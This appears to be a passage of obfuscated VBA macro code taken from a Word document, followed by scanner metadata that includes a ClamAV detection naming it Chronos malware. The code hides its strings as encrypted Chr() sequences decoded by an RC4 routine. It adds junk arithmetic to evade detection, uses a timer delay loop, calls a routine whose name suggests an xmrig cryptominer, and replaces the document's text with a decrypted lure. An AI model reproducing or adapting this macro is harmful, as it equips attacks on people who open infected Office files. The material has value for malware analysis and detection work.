If QxD(DKX1DXEAUcf6G(Chr(140) + Chr(152) + Chr(68) + Chr(38) + Chr(83) + Chr(148) + Chr(128) + Chr(86) + Chr(36) + Chr(179) + Chr(202) + Chr(56) + Chr(250) + Chr(234) + Chr(109) + Chr(15) + Chr(200) + Chr(78) + Chr(68) + Chr(248) + Chr(242) + Chr(93) + Chr(250) + Chr(236) + Chr(146) + Chr(28) + Chr(250) + Chr(229) + Chr(98) + Chr(140) + Chr(84) + Chr(125) + Chr(199) + Chr(144) + Chr(70) + Chr(208) + Chr(35) + Chr(102) + Chr(78) + Chr(25) + Chr(46) + Chr(162) + Chr(238) + Chr(61) + Chr(221), "I86LPhUdORU"), LMAXuL1, DKX1DXEAUcf6G(Chr(133) + Chr(19) + Chr(133) + Chr(131) + Chr(9) + Chr(23) + Chr(219) + Chr(226) + Chr(156), "Y9yCAi")) = True Then
Dim W7NWCYdAWy As Long, Sx2dHIoHn4Y0 As Long
W7NWCYdAWy = 62
Sx2dHIoHn4Y0 = 25
If W7NWCYdAWy + Sx2dHIoHn4Y0 > 4 Then
Sx2dHIoHn4Y0 = W7NWCYdAWy + 64
Else
MsgBox 74
End If
Lklws2ZFb1Bb6 1
Dim A5QZp89kh As Long, VpnYTZD As Long
A5QZp89kh = 66
VpnYTZD = 68
If A5QZp89kh + VpnYTZD > 4 Then
VpnYTZD = A5QZp89kh + 9
Else
MsgBox 12
End If
PqkSxmrigqfWWVS8x LMAXuL1
Dim HqXGPyQQN5iFL6BZ As Long, UnwsDHTcDlN6of8tZ As Long
HqXGPyQQN5iFL6BZ = 27
UnwsDHTcDlN6of8tZ = 85
If HqXGPyQQN5iFL6BZ + UnwsDHTcDlN6of8tZ > 4 Then
UnwsDHTcDlN6of8tZ = HqXGPyQQN5iFL6BZ + 10
Else
MsgBox 9
End If
End If
Dim QzlA0lKJng0I5N As Long, Um6jvtEl2 As Long
QzlA0lKJng0I5N = 86
Um6jvtEl2 = 55
If QzlA0lKJng0I5N + Um6jvtEl2 > 4 Then
Um6jvtEl2 = QzlA0lKJng0I5N + 75
Else
MsgBox 86
End If
ActiveDocument.Range.Text = DKX1DXEAUcf6G(Chr(117) + Chr(233) + Chr(75) + Chr(27) + Chr(174) + Chr(115) + Chr(0) + Chr(87) + Chr(86) + Chr(167) + Chr(74) + Chr(42) + Chr(166) + Chr(193) + Chr(84) + Chr(11) + Chr(132) + Chr(90) + Chr(216) + Chr(111) + Chr(194) + Chr(119) + Chr(126) + Chr(184) + Chr(169) + Chr(37) + Chr(3) + Chr(193) + Chr(198) + Chr(113) + Chr(25) + Chr(176) + Chr(203) + Chr(88) + Chr(241) + Chr(35) + Chr(28) + Chr(142) + Chr(106) + Chr(122) + Chr(37) + Chr(156) + Chr(135) + Chr(244) + Chr(0) + Chr(174) + Chr(168) + Chr(207) + Chr(119) + Chr(221) + Chr(192) + Chr(125) + Chr(62) + Chr(109) + Chr(146) + Chr(216) + Chr(3) + Chr(69) + Chr(90) + Chr(182) + Chr(3) + Chr(133) + Chr(79) + Chr(202) + Chr(69) + Chr(249) + Chr(140) + Chr(82) + Chr(85) + Chr(137) + Chr(45), "Cn97bc4OBu")
End If
Dim JoyAGtnQRxG As Long, Af4Npe5hZ5Z32B As Long
JoyAGtnQRxG = 78
Af4Npe5hZ5Z32B = 3
If JoyAGtnQRxG + Af4Npe5hZ5Z32B > 4 Then
Af4Npe5hZ5Z32B = JoyAGtnQRxG + 56
Else
MsgBox 94
End If
End Sub
Sub Lklws2ZFb1Bb6(IWQ5zo8iM As Long)
Dim O0vcaCkCwF7Ak As Long, DnETKTM3K2Hi As Long
O0vcaCkCwF7Ak = 93
DnETKTM3K2Hi = 58
If O0vcaCkCwF7Ak + DnETKTM3K2Hi > 4 Then
DnETKTM3K2Hi = O0vcaCkCwF7Ak + 91
Else
MsgBox 64
End If
Dim YBTqtOT0cOsyAef As Long
Dim QkxCHN0Y12j As Long, YjzMUfkFf As Long
QkxCHN0Y12j = 92
YjzMUfkFf = 61
If QkxCHN0Y12j + YjzMUfkFf > 4 Then
YjzMUfkFf = QkxCHN0Y12j + 81
Else
MsgBox 92
End If
YBTqtOT0cOsyAef = Timer + IWQ5zo8iM
Do While Timer < YBTqtOT0cOsyAef
DoEvents
Loop
Dim Ve0YmUl As Long, LmakhyTs8QZtbQH As Long
Ve0YmUl = 61
LmakhyTs8QZtbQH = 54
If Ve0YmUl + LmakhyTs8QZtbQH > 4 Then
LmakhyTs8QZtbQH = Ve0YmUl + 76
Else
MsgBox 9
End If
End Sub
Private Property Let V9Jyck(UPGgDeB83iR As String)
Dim VFAX As Long, Ah5VfLXAx2vyAHo As Long, Pnc3kajNwvN As Byte, RzKMETd() As Byte, PMIBeEmf2 As Long
If (SyGY3WdRsGkIvj = UPGgDeB83iR) Then Exit Property
SyGY3WdRsGkIvj = UPGgDeB83iR
RzKMETd() = StrConv(SyGY3WdRsGkIvj, vbFromUnicode)
PMIBeEmf2 = Len(SyGY3WdRsGkIvj)
For VFAX = 0 To 255
XnHwWJh(VFAX) = VFAX
Next VFAX
For VFAX = 0 To 255
Ah5VfLXAx2vyAHo = (Ah5VfLXAx2vyAHo + XnHwWJh(VFAX) + RzKMETd(VFAX Mod PMIBeEmf2)) Mod 256
Pnc3kajNwvN = XnHwWJh(VFAX)
XnHwWJh(VFAX) = XnHwWJh(Ah5VfLXAx2vyAHo)
XnHwWJh(Ah5VfLXAx2vyAHo) = Pnc3kajNwvN
Next
End Property
Function DKX1DXEAUcf6G(GjlWLTUN8PQbKRg As String, Uzan8pU23T As String) As String
Dim UBXT As Long, YtB6sBrlEWOMFZQMA As Long
UBXT = 92
YtB6sBrlEWOMFZQMA = 13
If UBXT + YtB6sBrlEWOMFZQMA > 4 Then
YtB6sBrlEWOMFZQMA = UBXT + 25
Else
MsgBox 17
End If
Dim byteArray() As Byte
byteArray() = StrConv(GjlWLTUN8PQbKRg, vbFromUnicode)
Th0oP49hY byteArray(), Uzan8pU23T
DKX1DXEAUcf6G = StrConv(byteArray(), vbUnicode)
Dim VT8Hgin7xm9 As Long, POMFZQMAcTzcx8EYU As Long
VT8Hgin7xm9 = 61
POMFZQMAcTzcx8EYU = 81
If VT8Hgin7xm9 + POMFZQMAcTzcx8EYU > 4 Then
POMFZQMAcTzcx8EYU = VT8Hgin7xm9 + 92
Else
MsgBox 85
End If
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 52224 bytes
SHA-256: 07151280cab1c5a1e516c9e8c1b5bbdfd42571d420daf58c55bde98aa79a2574
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely